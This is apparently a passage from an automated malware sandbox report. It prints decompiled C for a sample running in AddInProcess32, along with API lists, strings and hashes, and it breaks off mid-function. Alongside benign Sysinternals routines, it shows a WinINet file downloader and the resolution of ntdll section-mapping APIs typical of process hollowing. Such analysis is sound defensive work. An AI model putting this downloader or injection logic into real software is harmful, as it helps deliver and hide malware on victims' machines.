                                              • Software\Classes\lnkfile\Shell\Run as different user (netonly)..., xrefs: 0040198B
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command, xrefs: 00401997
                                              • ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004019D1
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command, xrefs: 0040194F
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user..., xrefs: 00401943
                                              • Software\Classes\lnkfile\Shell\Run as different user...\Command, xrefs: 00401967
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user..., xrefs: 004019A3
                                              • ShellRunas context menu handler unregistered., xrefs: 004019D6
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command, xrefs: 00401937
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Delete$Message
                                              • String ID: ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler unregistered.$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command$Software\Classes\lnkfile\Shell\Run as different user (netonly)...$Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command$Software\Classes\lnkfile\Shell\Run as different user...$Software\Classes\lnkfile\Shell\Run as different user...\Command
                                              • API String ID: 3870238891-4209861522
                                              • Opcode ID: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
                                              • Instruction ID: 5da64dfe4fce38312f7ee7f6f0bbc387e0a5c92d836bb648faa7c577a003e90f
                                              • Opcode Fuzzy Hash: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
                                              • Instruction Fuzzy Hash: EFF03F70AD5328B9E26023E25D0BFDA7D40CB24BA6F30011B7B4C3509249EA21E5C9EE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E02B51564(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi, WCHAR* _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, WCHAR* _a24, long _a28) {
                                              				signed int _v12;
                                              				short _v144;
                                              				short _v400;
                                              				short _v920;
                                              				WCHAR* _v924;
                                              				long _v928;
                                              				long _v932;
                                              				struct _SECURITY_ATTRIBUTES* _v936;
                                              				struct _OVERLAPPED* _v940;
                                              				void* _v944;
                                              				struct _SECURITY_ATTRIBUTES* _v948;
                                              				void _v952;
                                              				long _v956;
                                              				WCHAR* _v960;
                                              				intOrPtr _v964;
                                              				long _v968;
                                              				intOrPtr _v972;
                                              				signed int _v976;
                                              				WCHAR* _v980;
                                              				void* _v984;
                                              				signed int _t89;
                                              				long _t93;
                                              				int _t111;
                                              				long _t112;
                                              				void* _t114;
                                              				void* _t115;
                                              				int _t128;
                                              				void* _t131;
                                              				void* _t146;
                                              				long _t147;
                                              				intOrPtr _t162;
                                              				struct _OVERLAPPED* _t167;
                                              				intOrPtr _t170;
                                              				signed int _t175;
                                              				void* _t181;
                                              				long _t185;
                                              				void* _t188;
                                              				WCHAR* _t191;
                                              				signed int _t192;
                                              				void* _t193;
                                              
                                              				_t89 =  *0x2b56004; // 0xbb40e64e
                                              				_v12 = _t89 ^ _t192;
                                              				_v980 = __edx;
                                              				_v984 = __ecx;
                                              				_v964 = _a20;
                                              				_v924 = _a24;
                                              				_v956 = _a28;
                                              				_t175 = _a16;
                                              				_v960 = _a4;
                                              				_t93 = _a8;
                                              				_v928 = _t93;
                                              				_v972 = _a12 - _t93 + 1;
                                              				_v948 = 0;
                                              				_v920 = 0;
                                              				_v400 = 0;
                                              				_v936 = 0;
                                              				asm("sbb ecx, ecx");
                                              				_v976 = _t175;
                                              				_v940 =  ~_t175 & _t93 + _t175;
                                              				_t181 = 0xffffffff;
                                              				_t146 = HttpOpenRequestW(__ecx, L"GET", __edx, L"HTTP/1.1", 0x2b542bc, 0, _v956, 0);
                                              				_v944 = _t146;
                                              				_v952 = 0x2bf20;
                                              				InternetSetOptionW(_t146, 5,  &_v952, 4);
                                              				InternetSetOptionW(_t146, 6,  &_v952, 4);
                                              				_t147 = 0;
                                              				_v968 = 0;
                                              				_v932 = 0;
                                              				if(_v940 != 0) {
                                              					_push(_a12);
                                              					_t185 = _v928;
                                              					_t147 = _t185;
                                              					_push(_t185);
                                              					L11:
                                              					wsprintfW( &_v144, L"RANGE:bytes=%d-%d\r\n\r\n");
                                              					_t193 = _t193 + 0x10;
                                              					L12:
                                              					_t186 = _v944;
                                              					if(HttpAddRequestHeadersW(_v944,  &_v144, 0xffffffff, 0xa0000000) != 0) {
                                              						if(E02B514D8(_t186) != 0) {
                                              							_t188 = HeapAlloc(GetProcessHeap(), 8, 0x200000);
                                              							_v936 = _t188;
                                              							if(_t188 != 0) {
                                              								while(1) {
                                              									E02B52CE7(_t108, _t188, 0x200000);
                                              									_t111 = InternetReadFile(_v944, _t188, 0x200000,  &_v932);
                                              									_t189 = _t111;
                                              									if(_t111 == 0) {
                                              										break;
                                              									}
                                              									_t112 = _v932;
                                              									_t189 = 0;
                                              									if(_t112 == 0) {
                                              										if(_t147 != _v972) {
                                              											_t162 = _a20;
                                              											_t148 = _v924;
                                              											_a20 = _t162 + 1;
                                              											if(_t162 <= 0x1e) {
                                              												_v948 = 1;
                                              											}
                                              											L28:
                                              											if(_t181 != 0xffffffff) {
                                              												FlushFileBuffers(_t181);
                                              												CloseHandle(_t181);
                                              											}
                                              											_t114 = _v936;
                                              											if(_t114 != 0) {
                                              												HeapFree(GetProcessHeap(), 0, _t114);
                                              											}
                                              											L32:
                                              											_t115 = _v944;
                                              											if(_t115 != 0) {
                                              												InternetCloseHandle(_t115);
                                              											}
                                              											if(_v948 != 0) {
                                              												_t189 = E02B51564(_t148, _v984, _v980, _t181, _t189, _v960, _v928, _a12, _v976, _a20, _t148, _v956);
                                              											}
                                              											return E02B53C33(_v12 ^ _t192);
                                              										}
                                              										_t189 = 1;
                                              										if(_v940 != 0) {
                                              											L27:
                                              											_t148 = _v924;
                                              											goto L28;
                                              										}
                                              										FlushFileBuffers(_t181);
                                              										CloseHandle(_t181);
                                              										_t148 = _v924;
                                              										_t181 = _t181 | 0xffffffff;
                                              										MoveFileExW(_v924, _v960, 1);
                                              										goto L28;
                                              									}
                                              									_v928 = _v928 + _t112;
                                              									_t167 = _v940;
                                              									if(_t167 != 0) {
                                              										E02B52CC6(_t167, _v936, _t112);
                                              										_t108 = _v932;
                                              										_t193 = _t193 + 4;
                                              										_v940 = _t167 + _t108;
                                              										L23:
                                              										_t188 = _v936;
                                              										_t147 = _t147 + _t108;
                                              										continue;
                                              									}
                                              									_t128 = WriteFile(_t181, _v936, _t112,  &_v968, _t167);
                                              									_t189 = _t128;
                                              									if(_t128 == 0) {
                                              										goto L27;
                                              									}
                                              									FlushFileBuffers(_t181);
                                              									_t108 = _v932;
                                              									goto L23;
                                              								}
                                              								_t170 = _a20;
                                              								_a20 = _t170 + 1;
                                              								if(_t170 <= 0x1e) {
                                              									_v948 = 1;
                                              								}
                                              								goto L27;
                                              							}
                                              							goto L13;
                                              						}
                                              						_a20 = _a20 + 1;
                                              						_t131 = 0x1e;
                                              						asm("sbb eax, eax");
                                              						_v948 = _t131 + 1;
                                              						goto L27;
                                              					}
                                              					L13:
                                              					_t189 = 0;
                                              					goto L27;
                                              				}
                                              				_t191 = _v924;
                                              				if( *_t191 != 0) {
                                              					_t181 = CreateFileW(_t191, 0x40000000, 3, 0, 3, 0x80, 0);
                                              					_t189 = 0;
                                              					if(_t181 == 0xffffffff) {
                                              						L4:
                                              						_t148 = _v924;
                                              						goto L32;
                                              					}
                                              					_t147 = SetFilePointer(_t181, 0, 0, 2);
                                              					if(_t147 == 0xffffffff) {
                                              						goto L27;
                                              					}
                                              					if(_t147 == 0) {
                                              						goto L12;
                                              					}
                                              					_push(_a12);
                                              					_v928 = _t147;
                                              					_push(_t147);
                                              					goto L11;
                                              				}
                                              				E02B528DA( &_v400, _t191);
                                              				GetTempPathW(0x104,  &_v920);
                                              				PathAppendW( &_v920,  &_v400);
                                              				E02B52C9C(_t191,  &_v920);
                                              				_t181 = CreateFileW(_t191, 0x40000000, 3, 0, 2, 0x80, 0);
                                              				if(_t181 != 0xffffffff) {
                                              					_push(_a12);
                                              					_push(_v928);
                                              					goto L11;
                                              				} else {
                                              					_t189 = 0;
                                              					goto L4;
                                              				}
                                              			}











































                                              0x02b5156d
                                              0x02b51574
                                              0x02b5157c
                                              0x02b51584
                                              0x02b5158d
                                              0x02b51599
                                              0x02b515a2
                                              0x02b515ab
                                              0x02b515ae
                                              0x02b515b6
                                              0x02b515bc
                                              0x02b515c2
                                              0x02b515cc
                                              0x02b515d2
                                              0x02b515d9
                                              0x02b515e4
                                              0x02b515ea
                                              0x02b515ee
                                              0x02b515f6
                                              0x02b51603
                                              0x02b51624
                                              0x02b5162e
                                              0x02b51638
                                              0x02b51642
                                              0x02b51650
                                              0x02b51654
                                              0x02b51656
                                              0x02b5165c
                                              0x02b51668
                                              0x02b51735
                                              0x02b51738
                                              0x02b5173e
                                              0x02b51740
                                              0x02b51741
                                              0x02b5174d
                                              0x02b51753
                                              0x02b51756
                                              0x02b51756
                                              0x02b51773
                                              0x02b51787
                                              0x02b517b7
                                              0x02b517b9
                                              0x02b517c1
                                              0x02b51835
                                              0x02b5183c
                                              0x02b51855
                                              0x02b5185b
                                              0x02b5185f
                                              0x00000000
                                              0x00000000
                                              0x02b517c5
                                              0x02b517cb
                                              0x02b517cf
                                              0x02b51918
                                              0x02b51954
                                              0x02b51959
                                              0x02b51960
                                              0x02b51966
                                              0x02b5196c
                                              0x02b5196c
                                              0x02b51883
                                              0x02b51886
                                              0x02b51889
                                              0x02b51890
                                              0x02b51890
                                              0x02b51896
                                              0x02b5189e
                                              0x02b518aa
                                              0x02b518aa
                                              0x02b518b0
                                              0x02b518b0
                                              0x02b518b8
                                              0x02b518bb
                                              0x02b518bb
                                              0x02b518c8
                                              0x02b518fd
                                              0x02b518fd
                                              0x02b51911
                                              0x02b51911
                                              0x02b5191c
                                              0x02b51924
                                              0x02b5187d
                                              0x02b5187d
                                              0x00000000
                                              0x02b5187d
                                              0x02b5192b
                                              0x02b51932
                                              0x02b51938
                                              0x02b5193e
                                              0x02b51949
                                              0x00000000
                                              0x02b51949
                                              0x02b517d5
                                              0x02b517db
                                              0x02b517e3
                                              0x02b51817
                                              0x02b5181c
                                              0x02b51822
                                              0x02b51827
                                              0x02b5182d
                                              0x02b5182d
                                              0x02b51833
                                              0x00000000
                                              0x02b51833
                                              0x02b517f5
                                              0x02b517fb
                                              0x02b517ff
                                              0x00000000
                                              0x00000000
                                              0x02b51802
                                              0x02b51808
                                              0x00000000
                                              0x02b51808
                                              0x02b51865
                                              0x02b5186b
                                              0x02b51871
                                              0x02b51873
                                              0x02b51873
                                              0x00000000
                                              0x02b51871
                                              0x00000000
                                              0x02b517c3
                                              0x02b51789
                                              0x02b5178e
                                              0x02b51795
                                              0x02b51798
                                              0x00000000
                                              0x02b51798
                                              0x02b51775
                                              0x02b51775
                                              0x00000000
                                              0x02b51775
                                              0x02b5166e
                                              0x02b51677
                                              0x02b51706
                                              0x02b51708
                                              0x02b5170d
                                              0x02b516d9
                                              0x02b516d9
                                              0x00000000
                                              0x02b516d9
                                              0x02b5171a
                                              0x02b5171f
                                              0x00000000
                                              0x00000000
                                              0x02b51727
                                              0x00000000
                                              0x00000000
                                              0x02b51729
                                              0x02b5172c
                                              0x02b51732
                                              0x00000000
                                              0x02b51732
                                              0x02b5167f
                                              0x02b51690
                                              0x02b516a4
                                              0x02b516b2
                                              0x02b516d0
                                              0x02b516d5
                                              0x02b516e4
                                              0x02b516e7
                                              0x00000000
                                              0x02b516d7
                                              0x02b516d7
                                              0x00000000
                                              0x02b516d7

                                              APIs
                                              • HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51618
                                              • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02B51642
                                              • InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B51650
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 02B51690
                                              • PathAppendW.SHLWAPI(?,?), ref: 02B516A4
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02B516CA
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02B51700
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02B51714
                                              • wsprintfW.USER32 ref: 02B5174D
                                              • HttpAddRequestHeadersW.WININET(?,?,000000FF,A0000000), ref: 02B5176B
                                              • GetProcessHeap.KERNEL32(00000008,00200000), ref: 02B517AA
                                              • HeapAlloc.KERNEL32(00000000), ref: 02B517B1
                                              • WriteFile.KERNEL32(00000000,?,?,?,?), ref: 02B517F5
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 02B51802
                                              • InternetReadFile.WININET(?,00000000,00200000,?), ref: 02B51855
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 02B51889
                                              • CloseHandle.KERNEL32(00000000), ref: 02B51890
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02B518A3
                                              • HeapFree.KERNEL32(00000000), ref: 02B518AA
                                              • InternetCloseHandle.WININET(?), ref: 02B518BB
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 02B5192B
                                              • CloseHandle.KERNEL32(00000000), ref: 02B51932
                                              • MoveFileExW.KERNEL32(?,?,00000001), ref: 02B51949
                                                • Part of subcall function 02B528DA: CoCreateGuid.OLE32(?,?), ref: 02B52912
                                                • Part of subcall function 02B528DA: wsprintfW.USER32 ref: 02B5298A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: File$HeapInternet$BuffersCloseCreateFlushHandle$HttpOptionPathProcessRequestwsprintf$AllocAppendFreeGuidHeadersMoveOpenPointerReadTempWrite
                                              • String ID: GET$HTTP/1.1$RANGE:bytes=%d-%d
                                              • API String ID: 685608443-3179785383
                                              • Opcode ID: 36e1fea52369c1a08e559d012d1a89f80eb01e5636b9c3780a4f63bd54322296
                                              • Instruction ID: aadcb0b15821b5be8e93155e36f2249f27c9be9795734ce1e2eb123604e298d5
                                              • Opcode Fuzzy Hash: 36e1fea52369c1a08e559d012d1a89f80eb01e5636b9c3780a4f63bd54322296
                                              • Instruction Fuzzy Hash: 75B14A71E10238AFDB269F68DC44BAA7BB9EF09754F1005D9F94DAB280D7705E908F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E00401000(struct HWND__* __edi, void* __eflags) {
                                              				struct HINSTANCE__* _v42;
                                              				intOrPtr _v56;
                                              				struct HDC__* _v60;
                                              				struct HDC__* _v68;
                                              				struct HWND__* _v72;
                                              				struct tagPD _v76;
                                              				struct HDC__* _v84;
                                              				struct HDC__* _v92;
                                              				struct HDC__* _v100;
                                              				struct HDC__* _v108;
                                              				struct HDC__* _v112;
                                              				struct HDC__* _v116;
                                              				struct _DOCINFOW _v136;
                                              				intOrPtr _v140;
                                              				int _v144;
                                              				signed int _v148;
                                              				struct HICON__* _v152;
                                              				long _v156;
                                              				long _v160;
                                              				struct tagRECT _v176;
                                              				intOrPtr _v180;
                                              				intOrPtr _v184;
                                              				signed int _v188;
                                              				void* _v196;
                                              				void* _v204;
                                              				struct HICON__* _v212;
                                              				intOrPtr _v220;
                                              				int _t69;
                                              				signed int _t72;
                                              				signed int _t76;
                                              				struct HDC__* _t81;
                                              				signed int _t87;
                                              				signed int _t114;
                                              				struct HWND__* _t128;
                                              				long _t132;
                                              
                                              				_t128 = __edi;
                                              				E00409280(__edi,  &_v72, 0, 0x3e);
                                              				_v76 = 0x42;
                                              				_v72 = _t128;
                                              				_v42 = GetModuleHandleW(0);
                                              				_v56 = 0x14c;
                                              				_t69 = PrintDlgW( &_v76);
                                              				if(_t69 != 0) {
                                              					_v152 = SetCursor(LoadCursorW(0, 0x7f02));
                                              					_t72 = GetDeviceCaps(_v60, 8);
                                              					_v176.top = GetDeviceCaps(_v68, 0xa);
                                              					_v176.top = GetDeviceCaps(_v76, 0x58);
                                              					_t76 = GetDeviceCaps(_v84, 0x5a);
                                              					_v176.left = 0;
                                              					E00409280(_t128,  &(_v176.top), 0, 0x2c);
                                              					_v136.lpszOutput = 0;
                                              					_v136.lpszDatatype = 0;
                                              					_v136.fwType = 0;
                                              					_v116 = 0;
                                              					_v112 = 0;
                                              					SetMapMode(_v92, 1);
                                              					_t81 = _v100;
                                              					_v184 = _t81;
                                              					_v180 = _t81;
                                              					_v156 = 0;
                                              					_v160 = 0;
                                              					asm("cdq");
                                              					_t114 = _v196 / _t76 * 0x5a0;
                                              					asm("cdq");
                                              					_v176.left = _v160;
                                              					_v148 = _t114;
                                              					_v176.top = _v156;
                                              					_v176.bottom = _t114;
                                              					_t87 = _t72 / _v188 * 0x5a0;
                                              					_v152 = _t87;
                                              					_v176.right = _t87;
                                              					InflateRect( &_v176, 0xfffffa60, 0xfffffa60);
                                              					_v144 = 0;
                                              					_v140 = 0xffffffff;
                                              					_v136.cbSize = 0x14;
                                              					_v136.lpszDocName = L"Sysinternals License";
                                              					StartDocW(_v100,  &_v136);
                                              					_v204 = SendMessageW(_t128, 0xe, 0, 0);
                                              					StartPage(_v108);
                                              					_t132 = SendMessageW(_t128, 0x439, 1,  &_v196);
                                              					EndPage(_v112);
                                              					if(_t132 < _v212) {
                                              						do {
                                              							_v160 = _t132;
                                              							_v156 = 0xffffffff;
                                              							StartPage(_v116);
                                              							_t132 = SendMessageW(_t128, 0x439, 1,  &_v204);
                                              							EndPage(_v136.fwType);
                                              						} while (_t132 < _v220);
                                              					}
                                              					SendMessageW(_t128, 0x439, 0, 0);
                                              					EndDoc(_v116);
                                              					SetCursor(_v212);
                                              					return 1;
                                              				} else {
                                              					return _t69;
                                              				}
                                              			}






































                                              0x00401000
                                              0x00401017
                                              0x00401021
                                              0x00401029
                                              0x00401038
                                              0x0040103c
                                              0x00401044
                                              0x0040104c
                                              0x00401075
                                              0x00401079
                                              0x0040108d
                                              0x0040109a
                                              0x0040109e
                                              0x004010ab
                                              0x004010b3
                                              0x004010c4
                                              0x004010c8
                                              0x004010cc
                                              0x004010d0
                                              0x004010d4
                                              0x004010d8
                                              0x004010de
                                              0x004010e2
                                              0x004010e6
                                              0x004010ec
                                              0x004010f0
                                              0x004010f8
                                              0x00401109
                                              0x0040110f
                                              0x00401118
                                              0x00401120
                                              0x00401124
                                              0x00401128
                                              0x0040112c
                                              0x00401132
                                              0x00401136
                                              0x0040113f
                                              0x0040114f
                                              0x00401157
                                              0x0040115f
                                              0x00401167
                                              0x0040116f
                                              0x00401184
                                              0x0040118d
                                              0x004011a7
                                              0x004011a9
                                              0x004011b3
                                              0x004011b5
                                              0x004011ba
                                              0x004011be
                                              0x004011c6
                                              0x004011e0
                                              0x004011e2
                                              0x004011e8
                                              0x004011b5
                                              0x004011f8
                                              0x004011ff
                                              0x0040120a
                                              0x0040121a
                                              0x0040104e
                                              0x00401053
                                              0x00401053

                                              APIs
                                              • _memset.LIBCMT ref: 00401017
                                              • GetModuleHandleW.KERNEL32 ref: 0040102D
                                              • PrintDlgW.COMDLG32(?,?,?,?,?), ref: 00401044
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040105B
                                              • SetCursor.USER32(00000000,?,?,?,?,?), ref: 00401062
                                              • GetDeviceCaps.GDI32(?,00000008), ref: 00401079
                                              • GetDeviceCaps.GDI32(?,0000000A), ref: 00401084
                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00401091
                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 0040109E
                                              • _memset.LIBCMT ref: 004010B3
                                              • SetMapMode.GDI32(?,00000001), ref: 004010D8
                                              • InflateRect.USER32(?,?,FFFFFA60), ref: 0040113F
                                              • StartDocW.GDI32 ref: 0040116F
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00401182
                                              • StartPage.GDI32(?), ref: 0040118D
                                              • SendMessageW.USER32(?,00000439,00000001,?), ref: 004011A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CapsDevice$CursorMessageSendStart_memset$HandleInflateLoadModeModulePagePrintRect
                                              • String ID: B$Sysinternals License
                                              • API String ID: 2038973732-3449285610
                                              • Opcode ID: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
                                              • Instruction ID: bdae98e849ea38a2b48d3d89d57636c7b0b180fdbc1935bf1a89306988cad38c
                                              • Opcode Fuzzy Hash: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
                                              • Instruction Fuzzy Hash: 16512EB1A48300AFD310DFA9DD45B5BBBE4BB88714F004A2DF689E72A0D774D845CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E02B52730(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v268;
                                              				char _v528;
                                              				char _v532;
                                              				signed int _t19;
                                              				char _t27;
                                              				_Unknown_base(*)()* _t38;
                                              				void* _t47;
                                              				char _t48;
                                              				signed int _t52;
                                              				void* _t54;
                                              				void* _t61;
                                              				intOrPtr* _t62;
                                              				struct HINSTANCE__* _t63;
                                              				signed int _t66;
                                              
                                              				_t61 = __esi;
                                              				_t54 = __edi;
                                              				_t47 = __ebx;
                                              				_t19 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t19 ^ _t66;
                                              				if( *0x2b593a4 == 0 ||  *0x2b593a0 == 0 ||  *0x2b5939c == 0 ||  *0x2b59398 == 0 ||  *0x2b59394 == 0 ||  *0x2b59390 == 0) {
                                              					_push(_t47);
                                              					_t48 = 0;
                                              					_v528 = 0;
                                              					if(GetSystemDirectoryA( &_v528, 0x104) != 0) {
                                              						_push(_t61);
                                              						_push(_t54);
                                              						_v268 = 0;
                                              						_v532 = 0;
                                              						_t62 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                              						if(_t62 != 0) {
                                              							 *_t62(GetCurrentProcess(),  &_v532);
                                              						}
                                              						if(_v532 == _t48) {
                                              							do {
                                              								_t27 =  *((intOrPtr*)(_t66 + _t48 - 0x20c));
                                              								 *((char*)(_t66 + _t48 - 0x108)) = _t27;
                                              								_t48 = _t48 + 1;
                                              							} while (_t27 != 0);
                                              							PathAppendA( &_v268, "ntdll.dll");
                                              						} else {
                                              							_t52 = 7;
                                              							memcpy( &_v268, "X:\\Windows\\SysWOW64\\ntdll.dll", _t52 << 2);
                                              							asm("movsw");
                                              						}
                                              						_v268 = _v528;
                                              						_t63 = LoadLibraryA( &_v268);
                                              						 *0x2b593a4 = GetProcAddress(_t63, "RtlInitUnicodeString");
                                              						 *0x2b593a0 = GetProcAddress(_t63, "ZwOpenFile");
                                              						 *0x2b5939c = GetProcAddress(_t63, "ZwCreateSection");
                                              						 *0x2b59398 = GetProcAddress(_t63, "ZwMapViewOfSection");
                                              						 *0x2b59394 = GetProcAddress(_t63, "NtUnmapViewOfSection");
                                              						_t38 = GetProcAddress(_t63, "NtQueryInformationProcess");
                                              						 *0x2b59390 = _t38;
                                              						if( *0x2b593a4 == 0 ||  *0x2b593a0 == 0 ||  *0x2b5939c == 0 ||  *0x2b59398 == 0 ||  *0x2b59394 == 0 || _t38 == 0) {
                                              							goto L21;
                                              						} else {
                                              						}
                                              					}
                                              				} else {
                                              				}
                                              				return E02B53C33(_v8 ^ _t66);
                                              			}


















                                              0x02b52730
                                              0x02b52730
                                              0x02b52730
                                              0x02b52739
                                              0x02b52740
                                              0x02b5274a
                                              0x02b52781
                                              0x02b5278d
                                              0x02b52790
                                              0x02b5279e
                                              0x02b527a4
                                              0x02b527a5
                                              0x02b527b0
                                              0x02b527b6
                                              0x02b527cb
                                              0x02b527cf
                                              0x02b527df
                                              0x02b527df
                                              0x02b527e7
                                              0x02b52803
                                              0x02b52803
                                              0x02b5280a
                                              0x02b52811
                                              0x02b52812
                                              0x02b52822
                                              0x02b527e9
                                              0x02b527eb
                                              0x02b527f7
                                              0x02b527f9
                                              0x02b527fb
                                              0x02b5282e
                                              0x02b52841
                                              0x02b52851
                                              0x02b5285e
                                              0x02b5286b
                                              0x02b52878
                                              0x02b52885
                                              0x02b5288a
                                              0x02b52894
                                              0x02b5289a
                                              0x00000000
                                              0x02b528c4
                                              0x02b528c6
                                              0x02b5289a
                                              0x02b52779
                                              0x02b5277b
                                              0x02b528d9

                                              APIs
                                              • GetSystemDirectoryA.KERNEL32 ref: 02B52796
                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 02B527BC
                                              • GetProcAddress.KERNEL32(00000000), ref: 02B527C9
                                              • GetCurrentProcess.KERNEL32(?), ref: 02B527D8
                                              • PathAppendA.SHLWAPI(?,ntdll.dll), ref: 02B52822
                                              • LoadLibraryA.KERNEL32(?), ref: 02B5283B
                                              • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 02B52849
                                              • GetProcAddress.KERNEL32(00000000,ZwOpenFile), ref: 02B52856
                                              • GetProcAddress.KERNEL32(00000000,ZwCreateSection), ref: 02B52863
                                              • GetProcAddress.KERNEL32(00000000,ZwMapViewOfSection), ref: 02B52870
                                              • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 02B5287D
                                              • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 02B5288A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: AddressProc$AppendCurrentDirectoryHandleLibraryLoadModulePathProcessSystem
                                              • String ID: IsWow64Process$NtQueryInformationProcess$NtUnmapViewOfSection$RtlInitUnicodeString$X:\Windows\SysWOW64\ntdll.dll$ZwCreateSection$ZwMapViewOfSection$ZwOpenFile$kernel32$ntdll.dll$Nqt
                                              • API String ID: 3757806306-154886105
                                              • Opcode ID: 72957f7d760a3ddb08af6d27586b9eee5e7743c04e2a1989d95e6da7885244d1
                                              • Instruction ID: e65d43695f34d3b286845e26ba654bf13e13840f8545d0db2b682fdfc816b27a
                                              • Opcode Fuzzy Hash: 72957f7d760a3ddb08af6d27586b9eee5e7743c04e2a1989d95e6da7885244d1
                                              • Instruction Fuzzy Hash: 0241A330C86734DEEB259FA4A84D79677B4EF04744F1589EAAC05AF190C7B854D4CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E00406CE5(void* __edx, intOrPtr _a4) {
                                              				long _v4;
                                              				void* __ebx;
                                              				void* __ecx;
                                              				void* __edi;
                                              				void* _t9;
                                              				int _t11;
                                              				void* _t14;
                                              				void* _t16;
                                              				void* _t18;
                                              				void* _t19;
                                              				void* _t24;
                                              				void* _t26;
                                              				intOrPtr _t30;
                                              				void* _t34;
                                              				void* _t37;
                                              				signed int _t38;
                                              				void** _t40;
                                              				void* _t42;
                                              				void* _t45;
                                              				void* _t48;
                                              				void* _t49;
                                              				void* _t50;
                                              				void* _t51;
                                              
                                              				_t37 = __edx;
                                              				_t30 = _a4;
                                              				_t38 = 0;
                                              				while(_t30 !=  *((intOrPtr*)(0x4138d0 + _t38 * 8))) {
                                              					_t38 = _t38 + 1;
                                              					if(_t38 < 0x17) {
                                              						continue;
                                              					}
                                              					break;
                                              				}
                                              				if(_t38 >= 0x17) {
                                              					return _t9;
                                              				}
                                              				if(E0040B0DD(3) == 1) {
                                              					L22:
                                              					_t11 = GetStdHandle(0xfffffff4);
                                              					_t45 = _t11;
                                              					if(_t45 != 0 && _t45 != 0xffffffff) {
